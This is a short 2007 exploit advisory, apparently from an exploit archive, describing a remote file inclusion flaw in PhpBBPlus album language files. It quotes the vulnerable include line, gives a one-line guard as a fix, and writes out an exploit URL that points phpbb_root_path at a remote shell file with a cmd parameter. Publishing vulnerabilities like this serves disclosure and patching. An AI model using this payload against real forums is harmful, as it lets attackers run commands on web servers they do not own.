Home / exploits

PDF

phpbbplusrbt-rfi.txt

Posted on 25 September 2007

AUTHOR :
Rbt-4 Crew
Contact:
info@rbt-4.net

Found Rfi in
language/lang_german/lang_admin_album.php
language/lang_english/lang_admin_album.php

Vulnerability info:
Line: 25
Code: include($phpbb_root_path.'language/lang_german/lang_hierarchy_album.' . $phpEx);

Exploit example:
http://[PhpBBPlus]/language/lang_english/lang_admin_album.php?phpbb_root_path=[shell.txt]?cmd=

Fix rfi:
Line: 24
Code: if(!defined('IN_PHPBB')) die("Fixed...Sorry =)");

 

TOP